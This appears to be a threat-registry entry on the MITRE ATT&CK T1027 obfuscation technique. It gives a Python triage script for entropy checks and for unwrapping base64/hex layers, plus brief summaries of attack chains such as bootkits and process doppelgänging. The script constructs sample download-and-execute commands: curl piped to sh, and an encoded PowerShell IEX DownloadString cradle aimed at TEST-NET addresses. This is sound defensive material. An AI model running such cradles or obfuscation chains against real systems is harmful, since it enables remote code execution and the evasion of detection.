Obfuscated Files or Information
Hide artifacts via encoding, packing, or encryption.
§ Where this technique fits
T1027 is catalogued under the Defense Evasion tactic in MITRE ATT&CK. It appears in 4 approved dossiers in the registry, at step 5.8 on average, and in every one of them it is the final step of the chain: the attacker already has a foothold and obfuscates the payload so the artifact it leaves behind is not recognised.
Authoritative reference: attack.mitre.org/techniques/T1027/.
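The one-line description covers three flavours of T1027 (encoding, packing, encryption). As an added triage example, not part of this registry entry or of any listed dossier, the Python below does the two checks a responder wants first: flag a blob as packed/encrypted by byte entropy, and unwrap nested hex/base64 layers from a command line (including the UTF-16LE form used by PowerShell -EncodedCommand). Every sample artifact is constructed here: the shell script, the SHA-256 counter keystream standing in for a packer's cipher, and the command lines pointing at TEST-NET addresses.

```python
"""Triage helpers for T1027 artifacts: entropy verdict for blobs, and
layered hex/base64 unwrapping for command lines. All samples constructed."""
import base64
import hashlib
import math
import re
from collections import Counter

# --- constructed samples (not from any real incident) -------------------
PLAINTEXT = (b"#!/bin/sh\n# rotate logs\nfor f in /var/log/*.log; do gzip -k \"$f\"; done\n") * 40


def keystream(key: bytes, length: int) -> bytes:
    """Deterministic SHA-256 counter-mode keystream, a stand-in for a packer's cipher."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


ENCRYPTED = xor_encrypt(PLAINTEXT, b"demo-key")

INNER = "curl -s http://192.0.2.10/p | sh"            # 192.0.2.0/24 is TEST-NET-1
_L1 = base64.b64encode(INNER.encode()).decode()
CMD_B64 = f'bash -c "echo {_L1} | base64 -d | sh"'   # one base64 layer
CMD_HEX_B64 = f"echo {_L1.encode().hex()} | xxd -r -p | base64 -d | sh"  # hex over base64
_PS = 'IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.10/a")'
CMD_PS = "powershell -EncodedCommand " + base64.b64encode(_PS.encode("utf-16le")).decode()


# --- entropy -------------------------------------------------------------
def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling for a uniform byte stream."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_verdict(data: bytes, threshold: float = 7.0) -> str:
    """Text and most native code sit well under 7.0; packed or encrypted data sits near 8.0."""
    return "packed/encrypted" if shannon_entropy(data) >= threshold else "plain"


# --- layered encodings ---------------------------------------------------
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}){8,}$")
B64_RE = re.compile(r"^(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$")


def _candidate_tokens(text: str):
    for tok in text.split():
        yield tok.strip("\"'`;")


def peel_encodings(command: str, max_layers: int = 8):
    """Follow nested hex/base64 layers in a command line.
    Returns [(encoding, decoded_text), ...], innermost last."""
    layers, current = [], command
    for _ in range(max_layers):
        hit = next((t for t in _candidate_tokens(current)
                    if HEX_RE.match(t) or B64_RE.match(t)), None)
        if hit is None:
            break
        # Test hex first: a pure-hex string also satisfies the base64 alphabet.
        if HEX_RE.match(hit):
            name, raw = "hex", bytes.fromhex(hit)
        else:
            name, raw = "base64", base64.b64decode(hit, validate=True)
        # PowerShell -EncodedCommand is UTF-16LE; ASCII text shows a NUL at every odd byte.
        if raw and len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
            name, text = name + "/utf-16le", raw.decode("utf-16le")
        else:
            try:
                text = raw.decode("utf-8")
            except UnicodeDecodeError:
                # Opaque binary payload: record its size and entropy, then stop.
                layers.append((name + "/binary",
                               f"<{len(raw)} bytes, entropy {shannon_entropy(raw):.2f}>"))
                break
        layers.append((name, text))
        current = text
    return layers


if __name__ == "__main__":
    print("plaintext :", entropy_verdict(PLAINTEXT), f"{shannon_entropy(PLAINTEXT):.2f}")
    print("encrypted :", entropy_verdict(ENCRYPTED), f"{shannon_entropy(ENCRYPTED):.2f}")
    for cmd in (CMD_B64, CMD_HEX_B64, CMD_PS):
        print(peel_encodings(cmd))
```

The entropy threshold is a triage heuristic, not a verdict: compressed archives and media files also score near 8.0, so the check is useful for finding a dropped blob worth unpacking, not for declaring it malicious. The decoder stops as soon as a layer is not valid text and reports the payload's size and entropy, which is usually the point where the analyst switches from shell tricks to a hex editor or an unpacker.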
§ Dossiers chaining this technique
- step 5 / 5
LaunchDaemon persistence as root
Once running as root (via sudo or a local privilege-escalation exploit), drop a .plist into /Library/LaunchDaemons. launchd loads it on every boot without any user session, so the implant survives user logout and a full power-cycle.
- step 6 / 6
LogoFAIL → UEFI bootkit → persistent ring-0
Drop a malformed JPG/PNG/BMP into the boot-logo path on the EFI system partition. The vendor's UEFI image parser handles it pre-OS, before Secure Boot has verified the OS loader, so the attacker code runs outside anything Secure Boot checks; the resulting bootkit survives an OS wipe and reinstall.
- step 6 / 6
Process doppelgänging → spawn signed image with attacker bytes
Open a legitimate signed executable inside an NTFS transaction (TxF), overwrite it with the attacker image, create a section and then a process from the transacted file, and roll the transaction back. The file on disk is unchanged while the mapped process holds the attacker bytes, so an AV scan of the file at scan time sees only the legitimate signed image.
- step 6 / 6
Cross-chain bridge validator-set bypass → mint wrapped tokens
The bridge's validator or proof check can be satisfied without honest validators: Nomad-class, where an initialisation bug marked the zero Merkle root as already proven so any unproven message was accepted, or Ronin-class, where enough validator keys (5 of 9) were compromised to meet the signing threshold. Either way the attacker mints wrapped tokens on the destination chain without locking anything on the source.